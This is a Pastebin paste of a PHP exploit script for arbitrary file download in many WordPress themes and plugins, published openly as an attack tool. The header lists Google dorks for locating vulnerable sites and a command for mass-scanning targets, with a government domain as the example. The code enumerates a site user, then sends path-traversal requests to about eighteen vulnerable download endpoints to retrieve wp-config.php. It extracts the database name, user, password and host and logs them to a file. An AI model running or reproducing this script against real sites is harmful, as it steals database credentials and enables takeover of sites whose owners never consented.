API tools faq
paste
Advertisement
Googleinurl

[EXPLOIT] Wordpress A.F.D Verification/ INURL - BRASIL

Googleinurl
Nov 21st, 2014
4,907
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.88 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/php -q
  2. <?php
  3. #===============================================================================
  4. # NAME:                 Wordpress A.F.D Verification/ INURL - BRASIL
  5. # TIPE:                 Arbitrary File Download
  6. # Tested on:            Linux
  7. # EXECUTE:              php exploit.php www.target.gov.us
  8. # OUTPUT:               WORDPRES_A_F_D.txt
  9. # AUTOR:                Cleiton Pinheiro / NICK: GoogleINURL
  10. # Blog:                 http://blog.inurl.com.br
  11. # Twitter:              https://twitter.com/googleinurl
  12. # Fanpage:              https://fb.com/InurlBrasil
  13. # GIT:                  https://github.com/googleinurl
  14. # YOUTUBE               https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  15. # PACKETSTORMSECURITY:: http://packetstormsecurity.com/user/googleinurl/
  16. #
  17. # ------------------------------------------------------------------------------
  18. #  Comand Exec Scanner INURLBR:
  19. # ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
  20. # ------------------------------------------------------------------------------
  21. #
  22. # Download Scanner INURLBR:
  23. # https://github.com/googleinurl/SCANNER-INURLBR
  24. # ------------------------------------------------------------------------------
  25. #
  26. # D O R K'S:
  27. # ------------------------------------------------------------------------------
  28. #
  29. # WordPress Ultimatum Theme Arbitrary File Download
  30. # Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
  31. # Google Dork:: "Index of" & /wp-content/themes/ultimatum
  32. # ------------------------------------------------------------------------------
  33. #
  34. # WordPress Medicate Theme Arbitrary File Download
  35. # Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
  36. # Google Dork:: "Index of" & /wp-content/themes/medicate/
  37. # ------------------------------------------------------------------------------
  38. #
  39. # WordPress Centum Theme Arbitrary File Download
  40. # Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
  41. # Google Dork:: "Index of" & /wp-content/themes/Centum/
  42. # ------------------------------------------------------------------------------
  43. #
  44. # WordPress Avada Theme Arbitrary File Download
  45. # Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
  46. # Google Dork:: "Index of" & /wp-content/themes/Avada/
  47. # ------------------------------------------------------------------------------
  48. #
  49. # WordPress Striking Theme & E-Commerce Arbitrary File Download
  50. # Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
  51. # Google Dork:: "Index of" & /wp-content/themes/striking_r/
  52. # ------------------------------------------------------------------------------
  53. #
  54. # WordPress Beach Apollo Arbitrary File Download
  55. # Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
  56. # Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
  57. # ------------------------------------------------------------------------------
  58. #
  59. # Dork Google: inurl:ajax-store-locator
  60. # index of ajax-store-locator
  61. # Vendor Homepage:: http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
  62. # ------------------------------------------------------------------------------
  63. #
  64. # WordPress cuckootap Theme Arbitrary File Download
  65. # Google Dork:: "Index of" & /wp-content/themes/cuckootap/
  66. # Vendor Homepage:: http://www.cuckoothemes.com/
  67. # ------------------------------------------------------------------------------
  68. #
  69. # WordPress IncredibleWP Theme Arbitrary File Download
  70. # Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
  71. # Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/
  72. # ------------------------------------------------------------------------------
  73. #
  74. # WordPress Ultimatum Theme Arbitrary File Download
  75. # Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
  76. # Google Dork:: "Index of" & /wp-content/themes/ultimatum
  77. # ------------------------------------------------------------------------------
  78. #
  79. # WordPress Medicate Theme Arbitrary File Download
  80. # Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
  81. # Google Dork:: "Index of" & /wp-content/themes/medicate/
  82. # ------------------------------------------------------------------------------
  83. #
  84. # WordPress Centum Theme Arbitrary File Download
  85. # Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
  86. # Google Dork:: "Index of" & /wp-content/themes/Centum/
  87. # ------------------------------------------------------------------------------
  88. #
  89. # WordPress Avada Theme Arbitrary File Download
  90. # Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
  91. # Google Dork:: "Index of" & /wp-content/themes/Avada/
  92. # ------------------------------------------------------------------------------
  93. #  
  94. # WordPress Striking Theme & E-Commerce Arbitrary File Download
  95. # Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
  96. # Google Dork:: "Index of" & /wp-content/themes/striking_r/
  97. # ------------------------------------------------------------------------------
  98. #
  99. # WordPress Beach Apollo Arbitrary File Download
  100. # Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
  101. # Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
  102. # ------------------------------------------------------------------------------
  103. #
  104. # WordPress Trinity Theme Arbitrary File Download
  105. # Vendor Homepage:: https://churchthemes.net/themes/trinity/
  106. # Google Dork:: "Index of" & /wp-content/themes/trinity/
  107. # ------------------------------------------------------------------------------
  108. #
  109. # WordPress Lote27 Theme Arbitrary File Download
  110. # Google Dork:: "Index of" & /wp-content/themes/lote27/
  111. # ------------------------------------------------------------------------------
  112. #
  113. # WordPress Revslider Theme Arbitrary File Download
  114. # Vendor Homepage:: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
  115. # Google Dork:: wp-admin & inurl:revslider_show_image
  116. # ------------------------------------------------------------------------------
  117. #http://i.imgur.com/45BFlNe.png
  118. #===============================================================================
  119.  
  120. $banner = "  
  121.  _____
  122. (_____)    ____ _   _ _    _ _____  _                 ____                _ _
  123. (() ())  |_   _| \ | | |  | |  __ \| |               |  _ \              (_) |
  124.  \   /     | | |  \| | |  | | |__) | |       ______  | |_) |_ __ __ _ ___ _| |
  125.   \ /      | | | . ` | |  | |  _  /| |      |______| |  _ <| '__/ _` / __| | |
  126.   /=\     _| |_| |\  | |__| | | \ \| |____           | |_) | | | (_| \__ \ | |
  127.  [___]   |_____|_| \_|\____/|_|  \_\______|          |____/|_|  \__,_|___/_|_|
  128.  \n\033[1;37m0xNeither war between hackers, nor peace for the system.\033[0m\r
  129. ";
  130.  
  131. error_reporting(1);
  132. set_time_limit(0);
  133. ini_set('display_errors', 1);
  134. ini_set('max_execution_time', 0);
  135. ini_set('allow_url_fopen', 1);
  136. ob_implicit_flush(true);
  137. ob_end_flush();
  138.  
  139. function __plus() {
  140.  
  141.     ob_flush();
  142.     flush();
  143. }
  144.  
  145. print empty($argv[1]) ? exit("{$banner}0x[ERROR]: SET URL / Execute: php exploit.php www.target.gov.us\n") : NULL;
  146. $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
  147. !filter_var($argv[1], FILTER_VALIDATE_URL) ?  exit("{$banner}0x[ERROR]: SET URL / Execute: php exploit.php www.target.gov.us\n") : NULL;
  148.  
  149. print "\r\n{$banner}0x[EXPLOIT NAME]: WORDPRESS A.F.D / INURL - BRASIL";
  150. print "\n------------------------------------------------------------------------------------------------------------------";
  151. __plus();
  152. $users = file_get_contents("{$argv[1]}/?author=1");
  153. __plus();
  154. preg_match('/<title>(.*?)<\/title>/si', $users, $user);
  155. $wpuser = explode('|', $user[1]);
  156. $headers = get_headers($argv[1], 1);
  157. __plus();
  158. print "\n0x ". date("h:m:s") ." [INFO][COD]:: ";
  159. print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
  160. print "\n0x ". date("h:m:s") ." [INFO][Server]:: ";
  161. is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']);
  162. print "\n0x ". date("h:m:s") ." [INFO][X-Pingback]:: ";
  163. is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) : print_r($headers['X-Pingback']);
  164. print "\n0x ". date("h:m:s") ." [INFO][X-Powered-By]:: ";
  165. is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']);
  166. print_r("\n0x ". date("h:m:s") ." [INFO][TARGET]:: {$argv[1]} | [WP USER]:: " . str_replace("\n", '', $wpuser[0]));
  167. print "\n0x ". date("h:m:s") ." [INFO][OUTPUT FILE]:: WORDPRESS_A_F_D.txt\n";
  168. __plus();
  169.  
  170. __request($argv[1], '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php');
  171.  
  172. __request($argv[1], '/wp-content/force-download.php?file=../wp-config.php');
  173.  
  174. __request($argv[1], '/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php');
  175.  
  176. __request($argv[1], '/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php');
  177.  
  178. __request($argv[1], '/wp-content/themes/markant/download.php?file=../../wp-config.php');
  179.  
  180. __request($argv[1], '/wp-content/themes/yakimabait/download.php?file=./wp-config.php');
  181.  
  182. __request($argv[1], '/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php');
  183.  
  184. __request($argv[1], '/wp-content/themes/felis/download.php?file=../wp-config.php');
  185.  
  186. __request($argv[1], '/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php');
  187.  
  188. __request($argv[1], '/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php');
  189.  
  190. __request($argv[1], '/wp-content/themes/epic/includes/download.php?file=wp-config.php');
  191.  
  192. __request($argv[1], '/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php');
  193.  
  194. __request($argv[1], '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php');
  195.  
  196. __request($argv[1], '/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php');
  197.  
  198. __request($argv[1], '/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php');
  199.  
  200. __request($argv[1], '/wp-content/themes/lote27/download.php?download=../../../wp-config.php');
  201.  
  202. __request($argv[1], '/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php');
  203.  
  204. __request($argv[1], '/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php');
  205.  
  206. function __request($url, $plugin) {
  207.  
  208.     $objcurl = curl_init();
  209.     $caminho = NULL;
  210.     $status = array();
  211.  
  212.     curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
  213.     curl_setopt($objcurl, CURLOPT_HEADER, 1);
  214.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  215.     curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
  216.     curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
  217.     $corpo = curl_exec($objcurl);
  218.  
  219.     if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {
  220.  
  221.         return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
  222.     }
  223. __plus();
  224.  
  225.     if (preg_match("#DB_NAME#i", $corpo) || preg_match("#readfile(#i", $corpo)) {
  226.  
  227. //-----------------------------------------------------------------------------
  228.         preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
  229.         preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
  230.         preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
  231.         preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
  232.         preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
  233. //-----------------------------------------------------------------------------
  234. __plus();
  235.         $res = "\n------------------------------------------------------------------------------------------------------------------\n\033[0;32m0x ". date("h:m:s") ." [INFO][VULN]::    \033[1;37m [ " . date("d-m-Y H:i:s") . " ]\n";
  236.         $res.= ("\033[0;32m0x ". date("h:m:s") ." [INFO][VULN][DB]::\033[1;37m " . $status['DB_NAME'][0][0]);
  237.         $res.= ("::" . $status['DB_USER'][0][0]);
  238.         $res.= ("::" . $status['DB_PASSWORD'][0][0]);
  239.         $res.= ("::" . $status['DB_HOST'][0][0]);
  240.         $res.= ("::" . $status['DB_CHARSET'][0][0]);
  241.         $res.= "\n\033[0;32m0x ". date("h:m:s") ." [INFO][VULN][URL]::\033[1;37m{$url}{$plugin}\033[0m";
  242.         $res.= "\n------------------------------------------------------------------------------------------------------------------\n\033[0m";
  243.         print $res;
  244.         $res = str_replace('','',str_replace('','',str_replace('','',$res)));
  245.         file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
  246. __plus();
  247.     } else {
  248.  
  249.         print "\n\033[1;31m0x ". date("h:m:s") ." [INFO][NOT VULN]::\033[1;37m {$url}{$plugin} \n\033[0m";
  250.     }
  251.     curl_close($objcurl);
  252. __plus();
  253. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!